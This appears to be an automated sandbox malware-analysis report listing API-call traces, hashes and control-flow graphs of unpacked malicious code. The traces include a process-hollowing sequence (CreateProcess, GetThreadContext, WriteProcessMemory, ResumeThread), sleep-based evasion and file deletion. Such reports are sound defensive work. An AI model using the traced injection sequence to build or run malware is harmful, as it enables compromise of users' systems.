• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: 38e9d5191e40b758f6cd9b11f0f3b4c4e106086092a3913515b68449a960020b
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: 881124724006589FDF127B60CC88E9FB7FDEF40705F0145A5E986EB105DB305A80CEA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
• GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
• CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
• CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: Process$Window$ExitFindOpenThread
• String ID:
• API String ID: 273847653-0
• Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
• Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
• Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
• Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,02383F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02383F51
• Sleep.KERNEL32(000003E8,00000000,?,02383F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02383F6F
• Sleep.KERNEL32(000007D0), ref: 02383F7F
• Sleep.KERNEL32(00000BB8), ref: 02383F8F
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
• Instruction ID: 64570113946bd3aed67f811deb3fb261c303ffdea24c6e977f0c63488a63663c
• Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
• Instruction Fuzzy Hash: 5FF01C705453509AFF603BB08C4C74A3AB9AF40B04F0400D0AE89AE696CF7480508EB5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: HandleLibraryLoadModule
• String ID: j
• API String ID: 4133054770-2747090070
• Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
• Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
• Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
• Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:70
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2692 ab0b6b 2694 ab0b7d 2692->2694 2693 ab08b3 GetPEB 2695 ab0bb1 2693->2695 2694->2693 2696 ab0c3f GetPEB 2695->2696 2697 ab0bb6 2696->2697 2610 ab08d9 2616 ab0cc4 2610->2616 2612 ab08e5 2619 ab0643 2612->2619 2614 ab08ef 2627 ab093e 2614->2627 2634 ab0c3f GetPEB 2616->2634 2618 ab0cc9 2618->2612 2620 ab0660 2619->2620 2636 ab067c 2620->2636 2622 ab0673 2642 ab06c2 2622->2642 2624 ab080f 2624->2614 2625 ab06b9 2625->2624 2646 ab0811 2625->2646 2628 ab0cc4 GetPEB 2627->2628 2630 ab094a 2628->2630 2629 ab0af1 2629->2614 2630->2629 2666 ab09d9 2630->2666 2632 ab09d2 2632->2629 2670 ab0af3 2632->2670 2635 ab0c4b 2634->2635 2635->2618 2635->2635 2637 ab0681 2636->2637 2638 ab06c2 GetPEB 2637->2638 2640 ab06b9 2638->2640 2639 ab080f 2639->2622 2640->2639 2641 ab0811 GetPEB 2640->2641 2641->2639 2644 ab06c7 2642->2644 2643 ab080f 2643->2625 2644->2643 2645 ab0811 GetPEB 2644->2645 2645->2643 2657 ab086e 2646->2657 2648 ab0840 2650 ab08d9 2648->2650 2651 ab0866 2648->2651 2652 ab0cc4 GetPEB 2650->2652 2651->2624 2660 ab08d9 2651->2660 2653 ab08e5 2652->2653 2654 ab0643 GetPEB 2653->2654 2655 ab08ef 2654->2655 2656 ab093e GetPEB 2655->2656 2656->2655 2658 ab0873 2657->2658 2658->2648 2659 ab08d9 GetPEB 2658->2659 2659->2658 2661 ab0cc4 GetPEB 2660->2661 2662 ab08e5 2661->2662 2663 ab0643 GetPEB 2662->2663 2664 ab08ef 2663->2664 2665 ab093e GetPEB 2664->2665 2665->2664 2669 ab09de 2666->2669 2667 ab0af3 GetPEB 2668 ab0af1 2667->2668 2668->2632 2669->2667 2669->2668 2672 ab0b01 2670->2672 2673 ab0cc4 GetPEB 2672->2673 2674 ab0b0d 2673->2674 2679 ab0b27 2674->2679 2676 ab0b20 2678 ab0b57 2676->2678 2683 ab0b65 2676->2683 2680 ab0b2c 2679->2680 2681 ab0b65 GetPEB 2680->2681 2682 ab0b57 2681->2682 2682->2676 2684 ab0b6a 2683->2684 2689 ab08b3 2684->2689 2690 ab08b9 2689->2690 
2691 ab08d9 GetPEB 2690->2691 2691->2690

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2887613195.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_ab0000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000010.00000002.2887408520.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000010.00000002.2887408520.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 023A098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023A09A5
  • Part of subcall function 023A098B: GetStartupInfoA.KERNEL32(00000000), ref: 023A09BD
• ExitProcess.KERNEL32(00000000), ref: 023A001D
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
• Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction ID: c7d53725e21010ff9c758411df96f51dcf8c62d1367791f143406d9d7b080951
• Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction Fuzzy Hash: 1472F06141E3C05FD72F9B644A79BA67F79FF03208B0D10EBD481DA0B3D6289909C76A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.1892604094.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_21f0000_bin.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
• API String ID: 544645111-3459585926
• Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
• Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 001C0959
• RtlExitUserThread.NTDLL(00000000), ref: 001C0961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
• GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
• String ID:
• API String ID: 1099281029-0
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
• Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
• Sleep.KERNEL32(000007D0), ref: 001C3F5B
• Sleep.KERNEL32(00000BB8), ref: 001C3F6B
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from this extraction; basic blocks 1c1345-1c13ec, calling VirtualProtect, VirtualAlloc, an internal routine at 1c0e7c, then VirtualProtect again.]

APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from this extraction; single basic block 23a3409-23a3462, calling GetVolumeInformationA and an internal routine at 23a3634.]

APIs
• GetVolumeInformationA.KERNELBASE(023A3405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 023A3409
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: InformationVolume
• String ID:
• API String ID: 2039140958-0
• Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
• Instruction ID: fc295450b17f6267912b9cf3b3424786af93421a84b2be300944b474e70b7cc8
• Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
• Instruction Fuzzy Hash: 9EF0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508D8AA4DBF206CA30A599CFA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from this extraction; basic blocks 1c292d-1c2b48, calling LoadLibraryA, VirtualAlloc, lstrcat (three sites), DeleteFileA (three sites) and Sleep, plus internal routines at 1c3653, 1c0c9c, 1c25e8, 1c29a6, 1c29dd, 1c2501, 1c2a14, 1c2b4d, 1c34f7, 1c343f, 1c2683, 1c26f9, 1c2e97 and 1c3057; the Sleep block loops back to 1c2a48.]

APIs
• LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
• lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
• String ID:
• API String ID: 675344582-0
• Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
• Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(023A2949,00000008,?,00000000,023A2835,00000000), ref: 023A2956
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 023A2993
• lstrcat.KERNEL32(00000000,023A29C1), ref: 023A29D0
• lstrcat.KERNEL32(00000000,023A29F8), ref: 023A2A07
• lstrcat.KERNEL32(00000000,023A2A2F), ref: 023A2A3E
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 023A2AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 023A2B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 023A2B66
Memory Dump Source
• Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
• String ID:
• API String ID: 675344582-0
• Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction ID: c2c53b7add89f5405ac2cbe349f6c6d84317309b57a9332ff12d303cee29235a
• Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction Fuzzy Hash: F2516371504214AEEB22AF708C58FAB77BDFF41705F4444B5AE86EA051EE309680CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable from this extraction; basic blocks 1c09d9-1c0af2, calling an internal routine at 1c3653, then CreateProcessA, GetThreadContext, VirtualProtectEx, DuplicateHandle, WriteProcessMemory, ResumeThread, and a Sleep/OpenMutexA loop; failure edges lead to the exit block at 1c0aec (call 1c0af3).]

APIs
• CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
• GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
• ResumeThread.KERNEL32(?), ref: 001C0AB6
• Sleep.KERNEL32(000003E8), ref: 001C0AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
• String ID:
• API String ID: 617592159-0
• Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
• Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
• Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
• Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 703 23a09fd-23a0a0c call 23a3677 CreateProcessA 706 23a0a12-23a0a34 GetThreadContext 703->706 707 23a0b10 703->707 706->707 710 23a0a3a-23a0a5f VirtualProtectEx 706->710 708 23a0b15-23a0b16 707->708 709 23a0b10 call 23a0b17 707->709 709->708 710->707 711 23a0a65-23a0aa4 DuplicateHandle 710->711 711->707 712 23a0aa6-23a0ad2 WriteProcessMemory 711->712 712->707 713 23a0ad4-23a0ae0 ResumeThread 712->713 714 23a0ae5-23a0b09 Sleep OpenMutexA 713->714 714->708 715 23a0b0b-23a0b0e 714->715 715->707 715->714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,023A09F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 023A0A04
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 023A0A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 023A0A57
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,023A5834,00000000,00000000,00000002), ref: 023A0A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 023A0ACA
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 023A0ADA
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 023A0AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023A0B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.1892758259.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_23a0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: 7ea44353f8bae36f642a803b331dacfbaa5631f79c4d5de9db08e8c321006128
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF3150316402189FEF269F20CC95BA977B9FF04748F0805E4AA49FE0E5DBB0D690CE64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 749 1c2ade-1c2af5 call 1c2683 744->749 750 1c2ab3 744->750 746->744 754 1c2a88 746->754 759 1c2af8-1c2b11 call 1c2e97 749->759 760 1c2af7 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
APIs
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 00000011.00000002.1891541634.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
